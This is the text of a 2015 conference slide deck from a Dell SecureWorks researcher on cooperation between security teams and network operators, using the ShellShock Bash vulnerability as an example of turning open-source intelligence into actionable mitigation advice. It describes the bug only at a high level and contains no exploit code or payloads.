APRICOT 2015 Security Day

Cooperation between Security Teams and Network Operators:

Actionable Intelligence on ShellShockArnold S. Yoon

Information Security Research Consultant, Counter Threat Unit (CTU)

ayoon@secureworks.com

2 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Agenda

• Cooperation between NW Operators and Security Teams

• Vulnerability Handling– Traditional questions

• Challenges and Gaps

• ShellShock example– Enrichment of OSINT

• Conclusion: Actionable intelligence

Dell - Internal Use - Confidential3Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Traditional Cooperation Model/CasesBetween N/W Operators and Security Teams

• Identify a stakeholder– Where does this hostile resource (IP/Domain) belongs to?– Who is the attacker?– Overload or Side work on N/W operation

• Vulnerability on N/W appliances– H/W and S/W– Management Console (Software)

• N/W protocol based vulnerability– POODLE SSL v3

• DDoS attack– NTP, DNS reflective Amplification attack

Dell - Internal Use - Confidential4Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Traditional questions on a vulnerability• Both for Security Teams and Network operators

– For all stakeholders

• Questions– What is the technical detail for the new vulnerability?– Does a technical mitigation resolution exists?

– Zero-day vulnerability– Mitigation plan

– What and who is impacted?– Impacted products (Hardware / Software)– Scope of impact in constituency

– Is there an (successful) exploit / incident case?– Exploit activity– Malware or Tools associated

– Alternative mitigation plan?– Disable service– Actionable Intelligence

CVSS (Common Vulnerability Scoring System) framework is widely adopted to address the questions.

5 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Challenges and Gap

• Security Teams– Vendor Dependent– Lack of information

› Identify the stakeholder

– Deliverables› Vuln. Advisory› Link to Patches› Indicators

• Network Operators– Legal issues

› Client information disclosure

– Additional workload– Mitigation Plan

› Implementing Patches on production N/W

– Lack of Contents for indicators

– Perception on N/W availability

Dell - Internal Use - Confidential6Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Change in Threat Landscape

• N/W providers involvement in IT services increases– Outsourced N/W service, including security– Could Computing (data centers)

• N/W Admins are often targeted as an initial attack vector

7 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

What is ShellShock

• Shellshock, also known as Bashdoor, is a family of security bugs[2] in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

• Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning.

Reference: http://en.wikipedia.org/wiki/Shellshock_(software_bug)

8 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Enrichment of OSINT

• OSINT– List of CVEs– List of CPEs– (Malicious indicators)

• Enrichment– Additional payload or malware– Association with known TG– Association with known malicious infrastructure– Passive DNS records– etc.

• Demonstration on ShellShock investigation

9 Dell - Internal Use - Confidential

Classification: //Dell SecureWorks/Confidential - Limited External Distribution:

Conclusion: Actionable Intelligence

• Vulnerability Advisories are not easy to digest or to take action– Mostly lack of content– Risk of blocking legitimate services

• Security Teams should start to provide more details

• N/W operators need to focus more on vulnerabilities mitigation in a N/W level. Still do not forget about host based vulnerabilities.

• Actionable intelligence promotes the coordination and better mitigation plan in timely manner